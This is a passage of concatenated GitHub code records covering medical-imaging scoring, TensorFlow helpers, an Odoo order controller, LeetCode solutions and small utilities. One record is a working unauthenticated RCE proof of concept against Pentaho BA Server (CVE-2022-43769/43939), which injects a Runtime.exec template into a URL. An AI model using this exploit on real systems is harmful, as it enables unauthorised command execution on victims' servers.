il_prediction_df[il_prediction_df['image_index'].isin(d[v])]['malignant_pred'].iloc[0]\n left_images += 1\n else:\n right_score += il_prediction_df[il_prediction_df['image_index'].isin(d[v])]['malignant_pred'].iloc[0]\n right_images += 1\n\n # Check to make sure there are images for the view\n if left_images > 0:\n left_score /= left_images\n left_malignancy.append(left_score)\n left_labels.append(d['cancer_label']['left_malignant'])\n\n if right_images > 0:\n right_score /= right_images\n right_malignancy.append(right_score)\n right_labels.append(d['cancer_label']['right_malignant'])\n\n predictions = left_malignancy + right_malignancy\n labels = left_labels + right_labels\n name = prediction_file.split('.')[0] + \"_breast_level\"\n\n generate_statistics(labels, predictions, name, bootstrapping)\n\n\ndef plot_pr_curve(precision, recall, name):\n save_path = name + '_pr_curve.png'\n plt.figure(figsize=(5, 5))\n plt.plot(recall, precision)\n plt.title(\"PR Curve\")\n plt.xlabel(\"Recall\")\n plt.ylabel(\"Precision\")\n plt.savefig(save_path)\n return save_path\n\n\ndef plot_roc_curve(preds, labels, name):\n save_path = name + '_roc_curve.png'\n fpr, tpr, threshold = metrics.roc_curve(labels, preds)\n plt.figure(figsize=(5, 5))\n plt.plot(fpr, tpr)\n plt.title(\"ROC Curve\")\n plt.xlabel(\"FPR\")\n plt.ylabel(\"TPR\")\n plt.savefig(save_path)\n return save_path\n\n\ndef main(pickle_file, prediction_file, bootstrapping):\n if str(bootstrapping.lower()) == 'no_bootstrap':\n bootstrapping = False\n else:\n bootstrapping = True\n breast_or_image = breast_or_image_level(prediction_file)\n if breast_or_image == \"image\":\n get_breast_level_scores_from_image_level(prediction_file, pickle_file, bootstrapping)\n get_image_level_scores(prediction_file, bootstrapping)\n else:\n get_breast_level_scores(prediction_file, pickle_file, bootstrapping)\n\n print(\"Prediction file: {}\".format(prediction_file))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2], sys.argv[3])\n","repo_name":"nyukat/mammography_metarepository","sub_path":"evaluation/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"83"} +{"seq_id":"8804329156","text":"from typing import Union, List, Optional\nimport warnings\nimport logging\nfrom typing import Mapping\n\nimport inspect\nimport numpy as np\nimport tensorflow as tf\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef booleans_processing(config, **kwargs):\n \"\"\"\n Process the input booleans of each model.\n Args:\n config ([`PretrainedConfig`]):\n The config of the running model.\n **kwargs:\n The boolean parameters\n Returns:\n A dictionary with the proper values for each boolean\n \"\"\"\n final_booleans = {}\n\n # Pure conv models (such as ConvNext) do not have `output_attentions`. If the signature has\n # `output_attentions`, it will be present here in `kwargs`, even if unset (in that case, as `None`)\n if \"output_attentions\" in kwargs:\n final_booleans[\"output_attentions\"] = (\n kwargs[\"output_attentions\"] if kwargs[\"output_attentions\"] is not None else config.output_attentions\n )\n final_booleans[\"output_hidden_states\"] = (\n kwargs[\"output_hidden_states\"] if kwargs[\"output_hidden_states\"] is not None else config.output_hidden_states\n )\n final_booleans[\"return_dict\"] = kwargs[\"return_dict\"] if kwargs[\"return_dict\"] is not None else config.return_dict\n\n if \"use_cache\" in kwargs:\n final_booleans[\"use_cache\"] = (\n kwargs[\"use_cache\"] if kwargs[\"use_cache\"] is not None else getattr(\n config, \"use_cache\", None)\n )\n return final_booleans\n\n\ndef input_values_processing(func, config, input_values, **kwargs):\n \"\"\"\n Process the input of each TensorFlow model including the booleans. In case of a list of symbolic inputs, each input\n has to be named accordingly to the parameters name, i.e. `input_values = tf.keras.Input(shape=(128,),\n dtype='float32', name=\"input_values\")` otherwise the order of the tensors will not be guaranteed during the\n training.\n Args:\n func (`callable`):\n The callable function of the TensorFlow model.\n config ([`PretrainedConfig`]):\n The config of the running model.\n **kwargs:\n The inputs of the model.\n Returns:\n Two lists, one for the missing layers, and another one for the unexpected layers.\n \"\"\"\n signature = dict(inspect.signature(func).parameters)\n signature.pop(\"kwargs\", None)\n signature.pop(\"self\", None)\n parameter_names = list(signature.keys())\n output = {}\n allowed_types = (tf.Tensor, bool, int,\n tuple, list, dict, np.ndarray)\n\n for k, v in kwargs.items():\n if isinstance(v, allowed_types) or v is None:\n output[k] = v\n else:\n raise ValueError(\n f\"Data of type {type(v)} is not allowed only {allowed_types} is accepted for {k}.\")\n\n if isinstance(input_values, (tuple, list)):\n for i, input in enumerate(input_values):\n # EagerTensors don't allow to use the .name property so we check for a real Tensor\n if type(input) == tf.Tensor:\n # Tensor names have always the pattern `name:id` then we check only the\n # `name` part\n tensor_name = input.name.split(\":\")[0]\n\n if tensor_name in parameter_names:\n output[tensor_name] = input\n else:\n output[parameter_names[i]] = input\n elif isinstance(input, allowed_types) or input is None:\n output[parameter_names[i]] = input\n else:\n raise ValueError(\n f\"Data of type {type(input)} is not allowed only {allowed_types} is accepted for\"\n f\" {parameter_names[i]}.\"\n )\n elif isinstance(input_values, Mapping):\n if \"inputs\" in input_values:\n warnings.warn(\n \"The `inputs` argument is deprecated and will be removed in a future version, use `input_values`\"\n \" instead.\",\n FutureWarning,\n )\n\n output[\"input_values\"] = input_values.pop(\"inputs\")\n\n if \"decoder_cached_states\" in input_values:\n warnings.warn(\n \"The `decoder_cached_states` argument is deprecated and will be removed in a future version, use\"\n \" `past_key_values` instead.\",\n FutureWarning,\n )\n output[\"past_key_values\"] = input_values.pop(\n \"decoder_cached_states\")\n\n for k, v in dict(input_values).items():\n if isinstance(v, allowed_types) or v is None:\n output[k] = v\n elif k not in parameter_names and \"args\" not in parameter_names:\n logger.warning(\n f\"The parameter {k} does not belongs to the parameter list {parameter_names} and will be ignored.\"\n )\n continue\n else:\n raise ValueError(\n f\"Data of type {type(v)} is not allowed only {allowed_types} is accepted for {k}.\")\n else:\n if isinstance(input_values, tf.Tensor) or input_values is None:\n output[parameter_names[0]] = input_values\n else:\n raise ValueError(\n f\"Data of type {type(input_values)} is not allowed only {allowed_types} is accepted for\"\n f\" {parameter_names[0]}.\"\n )\n\n for name in parameter_names:\n if name not in list(output.keys()) and name != \"args\":\n output[name] = kwargs.pop(name, signature[name].default)\n\n # When creating a SavedModel TF calls the method with LayerCall.__call__(args, **kwargs)\n # So to respect the proper output we have to add this exception\n if \"args\" in output:\n if output[\"args\"] is not None and type(output[\"args\"]) == tf.Tensor:\n tensor_name = output[\"args\"].name.split(\":\")[0]\n output[tensor_name] = output[\"args\"]\n else:\n # `args` in this case is always the first parameter, then `input_values`\n output[\"input_values\"] = output[\"args\"]\n\n del output[\"args\"]\n\n if \"kwargs\" in output:\n del output[\"kwargs\"]\n\n boolean_dict = {\n k: v\n for k, v in output.items()\n if k in [\"return_dict\", \"output_attentions\", \"output_hidden_states\", \"use_cache\"]\n }\n\n output.update(booleans_processing(config=config, **boolean_dict))\n\n return output\n\n\ndef shape_list(tensor: Union[tf.Tensor, np.ndarray]) -> List[int]:\n \"\"\"\n Deal with dynamic shape in tensorflow cleanly.\n Args:\n tensor (`tf.Tensor` or `np.ndarray`): The tensor we want the shape of.\n Returns:\n `List[int]`: The shape of the tensor as a list.\n \"\"\"\n if isinstance(tensor, np.ndarray):\n return list(tensor.shape)\n\n dynamic = tf.shape(tensor)\n\n if tensor.shape == tf.TensorShape(None):\n return dynamic\n\n static = tensor.shape.as_list()\n\n return [dynamic[i] if s is None else s for i, s in enumerate(static)]\n\n\ndef stable_softmax(logits: tf.Tensor, axis: Optional[int] = None, name: Optional[str] = None) -> tf.Tensor:\n \"\"\"\n Stable wrapper that returns the same output as `tf.nn.softmax`, but that works reliably with XLA on CPU. It is\n meant as a workaround for the [following issue](https://github.com/tensorflow/tensorflow/issues/55682), and will be\n removed after it gets fixed. The arguments and outputs are the same as `tf.nn.softmax`, and relies on the fact that\n `softmax(x) = softmax(x + c)` (see https://ogunlao.github.io/2020/04/26/you_dont_really_know_softmax.html).\n Args:\n logits (`tf.Tensor`):\n Must be one of the following types: half, float32, float64.\n axis (`int`, *optional*):\n The dimension softmax would be performed on. The default is -1 which indicates the last dimension.\n name (`str`, *optional*):\n A name for the operation.\n Returns:\n `tf.Tensor`:\n A Tensor. Has the same type and shape as logits.\n \"\"\"\n # TODO: When the issue linked above gets sorted, add a check on TF version here and use the original function if\n # it has the fix. After we drop the support for unfixed versions, remove this function.\n return tf.nn.softmax(logits=logits + 1e-9, axis=axis, name=name)\n\n\ndef get_initializer(initializer_range: float = 0.02) -> tf.initializers.TruncatedNormal:\n \"\"\"\n Creates a `tf.initializers.TruncatedNormal` with the given range.\n Args:\n initializer_range (*float*, defaults to 0.02): Standard deviation of the initializer range.\n Returns:\n `tf.initializers.TruncatedNormal`: The truncated normal initializer.\n \"\"\"\n return tf.keras.initializers.TruncatedNormal(stddev=initializer_range)\n","repo_name":"tamnguyenvan/tf_wav2vec2forctc","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38753002925","text":"import json\nimport logging\nimport re\nimport requests\n\n\ndef handle_non_200(answer):\n try:\n rsp = json.loads(answer.content)\n detail = rsp.get('detail', answer.text)\n except json.decoder.JSONDecodeError:\n try:\n detail = re.search(r\"(?<=',\n '/orders//'],\n type='json', auth='none', methods=['POST'])\n def create_sales_orders(self, action, root=None):\n status_code = 400\n environ = request.httprequest.headers.environ.copy()\n\n key = environ.get('HTTP_X_USER_ACCESS_KEY', False)\n token = environ.get('HTTP_X_USER_ACCESS_TOKEN', False)\n db_name = environ.get('HTTP_TENANT_DB', False)\n\n if not db_name:\n host = environ.get('HTTP_HOST', \"\")\n db_name = host.replace(\".\", \"_\").split(\":\")[0]\n\n registry = RegistryManager.get(db_name)\n with registry.cursor() as cr:\n connection_model = registry['cenit.connection']\n domain = [('key', '=', key), ('token', '=', token)]\n _logger.info(\n \"Searching for a 'cenit.connection' with key '%s' and \"\n \"matching token\", key)\n rc = connection_model.search(cr, SUPERUSER_ID, domain)\n _logger.info(\"Candidate connections: %s\", rc)\n if rc:\n r = self.create_order(cr, request)\n if not r:\n status_code = '200'\n else:\n return r\n else:\n status_code = 404\n\n return {'status': status_code}\n\n def create_order(self, cr, request):\n order_data = json.dumps(request.jsonrequest)\n order_data = simplejson.loads(str(order_data.decode()))\n\n partner_name = order_data['partner_id']['name']\n context = request.context\n\n partner_id = self.get_id_from_record(cr, 'res.partner', [('name', '=', partner_name)], context=context)\n if partner_id:\n order_data['partner_id'] = partner_id # Updating partner_id(Customer)\n order_data['partner_invoice_id'] = partner_id # Updating invoice address\n order_data['partner_shipping_id'] = partner_id # Updating shipping address\n\n order_data['payment_term_id'] = self.get_id_from_record(cr, 'account.payment.term',\n [('name', '=', order_data['payment_term_id'])],\n context=context)\n\n order_data['warehouse_id'] = self.get_id_from_record(cr, 'stock.warehouse',\n [('name', '=', order_data['warehouse_id'])],\n context=context)\n\n order_data['user_id'] = self.get_id_from_record(cr, 'res.users', [('name', '=', order_data['user_id'])],\n context=context) # Updating sales person\n\n order_data['team_id'] = self.get_id_from_record(cr, 'crm.team', [('name', '=', order_data['team_id'])],\n context=context)\n order_data['invoice_status'] = 'invoiced'\n\n errors = None\n\n lines = {}\n if order_data.get('order_line'):\n lines = order_data.pop('order_line')\n saleorder_registry = request.registry['sale.order']\n try:\n order_id = self.get_id_from_record(cr, 'sale.order', [('name', '=', order_data.get('name'))], context=context)\n if not order_id:\n order_id = saleorder_registry.create(cr, SUPERUSER_ID, order_data)\n else:\n saleorder_registry.write(cr, SUPERUSER_ID, order_id, order_data)\n if order_id:\n # Create order lines\n if lines:\n for line in lines:\n line['product_id'] = self.get_id_from_record(cr, 'product.product',\n [('name', '=', line['name'])],\n context=context)\n i_registry = request.registry['product.product']\n # if not line['product_id']:\n # i_registry.create(cr, SUPERUSER_ID, )\n\n product = i_registry.browse(cr, SUPERUSER_ID, line['product_id'], context=context)[0]\n line['name'] = product['name']\n line['order_id'] = order_id\n line['product_uom'] = product['uom_id']['id']\n line['price_unit'] = product['list_price']\n line['customer_lead'] = product['sale_delay']\n line['tax_id'] = [x.id for x in product['taxes_id']]\n\n line['property_account_income_id'] = product['property_account_income_id']['id']\n line['property_account_expense_id'] = product['property_account_expense_id']['id']\n\n line_id = self.get_id_from_record(cr, 'sale.order.line', [('order_id', '=', order_id),\n ('product_id', '=', product['id'])], context=context)\n if not line_id:\n request.registry['sale.order.line'].create(cr, SUPERUSER_ID, line)\n else:\n request.registry['sale.order.line'].write(cr, SUPERUSER_ID, line_id, line)\n except Exception as e:\n _logger.error(e)\n errors = e\n\n if not errors:\n order_data['order_line'] = lines\n errors = self.create_invoice(cr, order_data, request, context)\n\n return {'errors': errors} if errors else None\n\n return {'errors:': 'There is no Customer named %s'(partner_name)}\n\n def get_id_from_record(self, cr, model, domain, context):\n i_registry = request.registry[model]\n rc = i_registry.search(cr, SUPERUSER_ID, domain, context=context) # Returns id\n if rc:\n return rc[0]\n else:\n return None\n\n def create_invoice(self, cr, order, request, context):\n i_registry = request.registry['account.invoice']\n\n invoice_data = {}\n invoice_data['partner_id'] = order.get('partner_id', '')\n invoice_data['jmd_partner_shipping_id'] = order.get('partner_shipping_id', '')\n invoice_data['payment_term_id'] = order.get('payment_term_id', '')\n invoice_data['date_invoice'] = order.get('date_order', datetime.now())\n invoice_data['user_id'] = order.get('user_id', '')\n invoice_data['team_id'] = order.get('team_id', '')\n # invoice_data['currency_id'] = 'SGD'\n\n journal_id = self.get_id_from_record(cr, 'account.journal', [('name', '=', 'Sales Journal')], context=context)\n invoice_data['journal_id'] = journal_id\n\n account_id = self.get_id_from_record(cr, 'account.account', [('name', '=', 'Trade Debtors')], context=context)\n invoice_data['account_id'] = account_id\n\n invoice_data['origin'] = order.get('name', '')\n invoice_data['state'] = 'open'\n\n\n errors = ''\n try:\n invoice_id = self.get_id_from_record(cr, 'account.invoice', [('origin', '=', order.get('name'))], context=context)\n if not invoice_id:\n invoice_id = i_registry.create(cr, SUPERUSER_ID, invoice_data)\n else:\n i_registry.write(cr, SUPERUSER_ID, invoice_id, invoice_data)\n\n if invoice_id:\n orderlines = order.get('order_line', {})\n for ord in orderlines:\n ord['quantity'] = ord['product_uom_qty']\n ord.pop('product_uom_qty')\n ord['uom_id'] = ord['product_uom']\n ord.pop('product_uom')\n ord['invoice_line_tax_ids'] = ord['tax_id']\n ord.pop('tax_id')\n ord['invoice_id'] = invoice_id\n ord['account_id'] = ord.get('property_account_income_id', 'property_account_expense_id')\n\n line_id = self.get_id_from_record(cr, 'account.invoice.line', [('invoice_id', '=', invoice_id),\n ('product_id', '=', ord['product_id'])], context=context)\n if not line_id:\n request.registry['account.invoice.line'].create(cr, SUPERUSER_ID, ord)\n else:\n request.registry['account.invoice.line'].write(cr, SUPERUSER_ID, line_id, ord)\n except Exception as e:\n _logger.error(e)\n errors = e\n\n\n return errors if errors else None","repo_name":"andhit-r/odoo-integrations","sub_path":"cenit_magento_1_9_custom/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"3678458841","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n1946. Largest Number After Mutating Substring\nhttps://leetcode.com/problems/largest-number-after-mutating-substring/\n\nExample 1:\n\nInput: num = \"132\", change = [9,8,5,0,3,6,4,2,6,8]\nOutput: \"832\"\nExplanation: Replace the substring \"1\":\n- 1 maps to change[1] = 8.\nThus, \"132\" becomes \"832\".\n\"832\" is the largest number that can be created, so return it.\n\nExample 2:\n\nInput: num = \"021\", change = [9,4,3,5,7,2,1,9,0,6]\nOutput: \"934\"\nExplanation: Replace the substring \"021\":\n- 0 maps to change[0] = 9.\n- 2 maps to change[2] = 3.\n- 1 maps to change[1] = 4.\nThus, \"021\" becomes \"934\".\n\"934\" is the largest number that can be created, so return it.\n\nExample 3:\n\nInput: num = \"5\", change = [1,4,7,5,3,2,5,6,9,4]\nOutput: \"5\"\nExplanation: \"5\" is already the largest number that can be created, so return it.\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def maximumNumber1(self, num: str, change: List[int]) -> str:\n \"\"\"\n TC: O(N^2) / SC: O(N)\n Time Limit Exceeded\n \"\"\"\n max_num = num\n for i in range(len(num)):\n changed_num = num[:i] + str(change[int(num[i])]) + num[i + 1 :]\n if changed_num >= max_num:\n max_num = changed_num\n\n for j in range(1, len(num[i + 1 :]) + 1):\n changed_num = changed_num[: i + j] + str(change[int(num[i + j])]) + changed_num[i + j + 1 :]\n if changed_num >= max_num:\n max_num = changed_num\n else:\n break\n return max_num\n\n def maximumNumber2(self, num: str, change: List[int]) -> str:\n \"\"\"\n TC: O(N) / SC: O(N)\n \"\"\"\n num_list = list(num)\n changed = False\n for i in range(len(num_list)):\n if change[int(num_list[i])] > int(num_list[i]):\n num_list[i] = str(change[int(num_list[i])])\n changed = True\n elif changed == True and change[int(num_list[i])] < int(num_list[i]):\n break\n return \"\".join(num_list)\n\n def maximumNumber3(self, num: str, change: List[int]) -> str:\n \"\"\"\n TC: O(N^2) / SC: O(N)\n \"\"\"\n changed = False\n for i in range(len(list(num))):\n if str(change[int(num[i])]) > num[i]:\n num = num[:i] + str(change[int(num[i])]) + num[i + 1 :] # TC: O(N)\n changed = True\n elif changed == True and str(change[int(num[i])]) < num[i]:\n break\n return num\n","repo_name":"dongminlee94/coding-practice-leetcode","sub_path":"src/weekly_contest_251/1946_largest-number-after-mutating-substring.py","file_name":"1946_largest-number-after-mutating-substring.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10462482907","text":"import db_connect as dbc\n\n# 1. Get db\ndb = dbc.do_db_connect().cursor()\n\n# 2. Make sql\nsql = \"DELETE FROM customers WHERE ADDRESS = %s\"\nadr = (\"Mountain 21\", )\n\n# 3. Select\ndb.execute(sql, adr)\ndbc.do_db_connect().commit()\n\n# 4. Result\nprint(db.rowcount, \" recode(s) deleted\")","repo_name":"icelove82/python-study-adv","sub_path":"db_delete.py","file_name":"db_delete.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18751583242","text":"ticket = int(input('Введите количество билетов которе желаете приобрести (от 1 до 100): '))\r\nprint()\r\nif ticket <= 0: # корректность введенных билетов\r\n ticket = int(input('Введите корректное количество билетов которе желаете приобрести (от 1 до 100): '))\r\n\r\ndiscount = ticket #для подсчета дисконта\r\ncount1 = 0 # счетчик от 18 до 25\r\ncount2 = 0 # счетчик от 26\r\nwhile ticket !=0: \r\n age = int(input('Введите возраст учасника онлайн - конференции: '))\r\n \r\n if age < 18:\r\n print('Лица до 18 лет проходят, на конференцию, бесплатно.')\r\n \r\n elif 18 <= age <= 25:\r\n count1 += 990\r\n\r\n else:\r\n count2 += 1390\r\n ticket -= 1 \r\n \r\nif discount > 3:\r\n discount = int((count1 + count2) * 10 / 100) # считаем дисконт\r\n print('Итого к оплате, с учетом скидки 10%:', (count1 + count2) - discount,'руб.')\r\nelse:\r\n print('Итого к оплате:',count1 + count2,'руб.')\r\n \r\n\r\n\r\n \r\n \r\n \r\n","repo_name":"Apapqq/18.8.19","sub_path":"18.8.19.py","file_name":"18.8.19.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"48828615814","text":"from torch_geometric.utils import to_dense_adj\nimport torch\n\n\ndef count_collisions(coloring, edge_index):\n col = 0\n for i in range(edge_index.shape[1]):\n n1, n2 = edge_index[0][i], edge_index[1][i]\n if coloring[n1] == coloring[n2]:\n col += 1\n return col/2\n\n\ndef get_bad_edges(coloring, edge_index):\n bad_edges = {}\n for i in range(edge_index.shape[1]):\n n1, n2 = edge_index[0][i], edge_index[1][i]\n if coloring[n1] == coloring[n2]:\n bad_edges[(n1.item(), n2.item())] = 'red'\n return bad_edges\n\n\nclass PottsLoss:\n def __init__(self, edge_list):\n self.adj = to_dense_adj(edge_list)\n\n def __call__(self, col_probs):\n loss = torch.sum(torch.mm(col_probs, col_probs.T) * self.adj) / 2\n return loss\n\n# def dot_product_loss(col_probs, edge_list):\n# adj = to_dense_adj(edge_list).squeeze(0)\n# loss = torch.sum(torch.mm(col_probs, col_probs.T) * adj)/2\n# return loss/2\n\n\nclass WangLoss:\n def __init__(self, edge_list, lam=0.2):\n self.adj = to_dense_adj(edge_list)\n self.lam = lam\n\n def __call__(self, col_probs):\n log_probs = torch.log(col_probs)\n loss = torch.sum(torch.mm(col_probs, col_probs.T) * self.adj) / 2\n loss += -self.lam*torch.trace(torch.mm(col_probs, log_probs.T))\n return loss\n\n# def self_info_loss(col_probs):\n# log_probs = torch.log(col_probs)\n# loss = torch.trace(torch.mm(col_probs, log_probs.T))\n# return loss\n#\n#\n# def wang_loss_function(col_probs, edge_list, lam):\n# # Loss function from Wang's 2023 paper: A Graph Neural Network with Negative Message Passing for Graph Coloring\n# loss = dot_product_loss(col_probs, edge_list) + lam*self_info_loss(col_probs)\n# return loss\n","repo_name":"dipplestix/gnn_coloring","sub_path":"utilities/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43284808334","text":"\"\"\"Модуль графиков.\n\nИмпорты:\n import pandas as pd - для работы с ��анными\n from matplotlib import ... - для работы с графиками\n\nФункции:\n _init_subplots - инициализировать plots\n _setup_axis - настроить ось\n build_qualitative_charts - построить графики качественной переменной\n build_quantitative_charts - построить графики количественной переменной\n\n\"\"\"\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n\ndef _init_subplots(num: int, title: str) -> list[plt.Axes]:\n \"\"\"Инициализировать plots.\n\n Аргументы:\n num: int - количество графиков\n title: str - заголовок графиков\n\n Возвращает список созданных осей\n\n \"\"\"\n fig, axes = plt.subplots(1, num)\n fig.set_figwidth(num * 9)\n plt.suptitle(title)\n return axes\n\n\ndef _setup_axis(axis: plt.Axes, title: str, ylabel: str):\n \"\"\"Настроить ось.\n\n Аргументы:\n axis: plt.Axes - ось\n title: str - заголовок графика\n ylabel: str - подпись y\n\n \"\"\"\n axis.set_title(title)\n axis.set_xlabel(\"Значения\", labelpad=15)\n axis.set_ylabel(ylabel, labelpad=15)\n\n\ndef build_qualitative_charts(data: pd.Series, title: str):\n \"\"\"Построить графики качественной переменной.\n\n Аргументы:\n data: pd.Series - данные переменной\n title: str - заголовок графиков\n\n \"\"\"\n axes = _init_subplots(2, title)\n value_counts = data.value_counts()\n\n _setup_axis(axes[0], \"Столбчатая диагармма\", \"Количество\")\n axes[0].tick_params(\"x\", labelrotation=90)\n axes[0].bar(value_counts.index, value_counts)\n\n axes[1].set_title(\"Круговая диаграмма\")\n axes[1].pie(value_counts, autopct=\"%1.2f%%\", pctdistance=1.2)\n axes[1].legend(value_counts.index, title=\"Значения\",\n bbox_to_anchor=(1.08, 1))\n\n plt.show()\n\n\ndef build_quantitative_charts(data: pd.Series, title: str):\n \"\"\"Построить графики количественной переменной.\n\n Аргументы:\n data: pd.Series - данные переменной\n title: str - заголовок графиков\n\n \"\"\"\n axes = _init_subplots(3, title)\n seq = data.dropna()\n\n _setup_axis(axes[0], \"Гистограмма\", \"Частота\")\n axes[0].hist(seq)\n\n seq.plot.kde(0.1, ax=axes[1])\n _setup_axis(axes[1], \"График плотности\", \"Плотность\")\n\n _setup_axis(axes[2], \"Диаграмма размаха\", title)\n axes[2].tick_params(\"y\", labelleft=False)\n axes[2].boxplot(seq, vert=False)\n\n plt.show()\n","repo_name":"DefioOWol/data-analysis","sub_path":"Lab-1/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74854747790","text":"from flask import Flask, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_bootstrap import Bootstrap\nfrom uuid import uuid4\nimport config\n\napp = Flask(__name__)\napp.config.from_object('config')\nbootstrap = Bootstrap(app)\ndb = SQLAlchemy(app)\n\nclass Lesson(db.Model):\n __tablename__ = 'lessons'\n id = db.Column(db.Integer, primary_key=True)\n school_date = db.Column(db.String(80))\n subject = db.Column(db.String(80))\n topic = db.Column(db.Text)\n homework = db.Column(db.Text)\n\n def __init__(self, school_date, subject, topic, homework):\n self.school_date = school_date\n self.subject = subject\n self.topic = topic\n self.homework = homework\n\n def __repr__(self):\n return f\"Lesson({self.subject})\"\n\n@app.route('/')\ndef index():\n lessons = Lesson.query.filter(Lesson.topic.isnot(None) | Lesson.homework.isnot(None)).order_by(Lesson.school_date.desc()).all()\n return render_template('index.html', lessons=lessons)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1234)\n","repo_name":"jekabsGritans/lesson-display","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9295614706","text":"# Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)\n# Author: dwbzn\n# Date: 2022-04-04\n# Vendor: https://www.hitachivantara.com/\n# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html\n# Version: Pentaho BA Server 9.3.0.0-428\n# CVE: CVE-2022-43769, CVE-2022-43939\n# Tested on: Windows 11\n# Credits: https://research.aurainfosec.io/pentest/pentah0wnage\n# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).\n\n# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)\nimport requests\nimport argparse\n\nparser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')\nparser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')\nparser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)\nargs = parser.parse_args()\n\nurl = f\"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a\"\n\nprint (\"running...\")\nr = requests.get(url)\nif r.text == 'false':\n print (\"command should've executed! nice.\")\nelse:\n print (\"didn't work. sadge...\")","repo_name":"dwbzn/pentaho-exploits","sub_path":"cve-2022-43769.py","file_name":"cve-2022-43769.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"8152125209","text":"# -*- coding: utf-8 -*-\n\nfrom pyltp import SentenceSplitter\nfrom pyltp import Segmentor\nfrom pyltp import Postagger\nfrom pyltp import NamedEntityRecognizer\nimport os\n\nLTP_DATA_DIR = './model'\ncws_model_path = os.path.join(LTP_DATA_DIR, 'cws.model')\npos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model')\nner_model_path = os.path.join(LTP_DATA_DIR, 'ner.model')\nInput_file = './data/original.txt'\nOutput_file = './data/output_news.txt'\n# 得到分句,返回的是句子组成的列表\nInput_file = open(Input_file, 'r', encoding='utf-8').read()\nsentences = SentenceSplitter.split(Input_file)\n#print ('\\n'.join(sentences))\n\n# 得到词语,返回的是每行中以空格间隔的词\nsegmentor = Segmentor()\nsegmentor.load(cws_model_path)\nwords = []\nprint_words = []\nfor sentence in sentences:\n if (len(sentence) <= 1):\n continue\n word = segmentor.segment(sentence)\n print_word = (' '.join(word))\n print_words.append(print_word)\n words.append(word)\n#print ('\\n'.join(print_words))\n#print (words)\n#words = '\\n'.join(words)\nsegmentor.release()\n\n# 进行词性标注\npostagger = Postagger()\npostagger.load(pos_model_path)\n#words = ''\npostags = []\nfor word in words:\n postag = postagger.postag(word)\n postags.append(postag)\n #print (' '.join(postag))\n #print ('\\n')\n#print (' '.join(postags))\npostagger.release()\n\nrecognizer = NamedEntityRecognizer()\nrecognizer.load(ner_model_path)\n#words = ''\n#postags = ''\nnertags = []\nfor word, postag in zip(words, postags):\n #print (' '.join(word),' '.join(postag))\n word = list(word)\n postag = list(postag)\n #print (word,postag)\n nertag = recognizer.recognize(word, postag)\n nertags.append(nertag)\n #print (' '.join(nertag))\nrecognizer.release()\n\nwith open(Output_file, 'w', encoding='utf-8') as f:\n for word, nertag in zip(words, nertags):\n for w, n in zip(word, nertag):\n f.write(w + ' ' + n)\n f.write('\\n')\nprint ('done.')\n\nreadfile = open('./data/output_new.txt','r',encoding='utf-8').readlines()\nwith open('./data/output_news2.txt', 'w', encoding='utf-8') as f:\n for line in readfile:\n line.strip('\\r\\n')\n line.replace('\\n','')\n line = line.split()\n w = line[0]\n n = line[1][:-1]\n\n print (len(w), w, n)\n #print (n=='O', n=='S-Ns')\n if n == 'O' or n=='S' :\n for i in range(len(w)):\n f.write(w[i] + ' O\\n')\n elif n == 'S-Nh' or n == 'B-Nh':\n f.write(w[0] + ' B-PER\\n')\n for i in range(len(w)):\n if (i==0):\n continue\n f.write(w[i] + ' I-PER\\n')\n elif n == 'I-Nh' or n == 'E-Nh':\n for i in range(len(w)):\n f.write(w[i] + ' I-PER\\n')\n elif n == 'S-Ns' or n == 'B-Ns':\n f.write(w[0] + ' B-LOC\\n')\n for i in range(len(w)):\n if (i == 0):\n continue\n f.write(w[i] + ' I-LOC\\n')\n elif n == 'I-Ns' or n == 'E-Ns':\n for i in range(len(w)):\n f.write(w[i] + ' 